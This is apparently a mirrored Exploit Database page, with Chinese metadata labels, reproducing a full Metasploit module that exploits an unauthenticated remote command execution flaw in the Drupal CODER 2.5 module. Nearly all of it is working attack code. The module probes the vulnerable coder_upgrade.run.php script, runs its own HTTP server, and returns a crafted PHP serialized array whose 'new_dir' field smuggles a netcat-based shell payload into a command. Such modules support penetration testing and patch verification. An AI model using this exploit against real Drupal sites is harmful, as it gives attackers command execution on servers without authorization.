Drupal Module CODER 2.5 – Remote Command Execution (Metasploit)

• Exploit Database
• 15 阅读

• 作者： Mehmet Ince
  日期： 2016-07-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40149/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  
  def initialize(info={})
  super(update_info(info,
  'Name' => 'Drupal CODER Module Remote Command Execution',
  'Description'=> %q{
  This module exploits a Remote Command Execution vulnerability in
  Drupal CODER Module. Unauthenticated users can execute arbitrary command
  under the context of the web server user.
  
  CODER module doesn't sufficiently validate user inputs in a script file
  that has the php extension. A malicious unauthenticated user can make
  requests directly to this file to execute arbitrary command.
  The module does not need to be enabled for this to be exploited
  
  This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Nicky Bloor', # discovery
  'Mehmet Ince <mehmet@mehmetince.net>'# msf module
  ],
  'References' =>
  [
  ['URL', 'https://www.drupal.org/node/2765575']
  ],
  'Privileged' => false,
  'Payload'=>
  {
  'Space' => 225,
  'DisableNops' => true,
  'BadChars'=> "\x00\x2f",
  'Compat'=>
  {
  'PayloadType' => 'cmd',
  'RequiredCmd' => 'netcat netcat-e'
  },
  },
  'Platform' => ['unix'],
  'Arch' => ARCH_CMD,
  'Targets'=> [ ['Automatic', {}] ],
  'DisclosureDate' => 'Jul 13 2016',
  'DefaultTarget'=> 0
  ))
  
  register_options(
  [
  OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
  OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
  OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
  ]
  )
  end
  
  def check
  res = send_request_cgi(
  'method' => 'GET',
  'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
  )
  if res && res.code == 200
  Exploit::CheckCode::Appears
  else
  Exploit::CheckCode::Safe
  end
  end
  
  def on_request_uri(cli, _request)
  print_status("Incoming request detected...")
  p = ''
  p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
  p << 's:11:"theme_cache";s:16:"theme_cache_test";'
  p << 's:9:"variables";s:14:"variables_test";'
  p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
  p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
  p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
  p << 's:7:"new_dir";s:'
  p << (payload.encoded.length + 14).to_s
  p << ':"f --help && '
  p << payload.encoded
  p << ' #";s:4:"name";s:4:"test";}}}'
  print_status("Sending payload...")
  send_response(cli, p)
  end
  
  def exploit
  start_service
  send_request_cgi(
  'method' => 'GET',
  'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
  'encode_params' => false,
  'vars_get' => {
  'file' => get_uri
  }
  )
  stop_service
  end
  end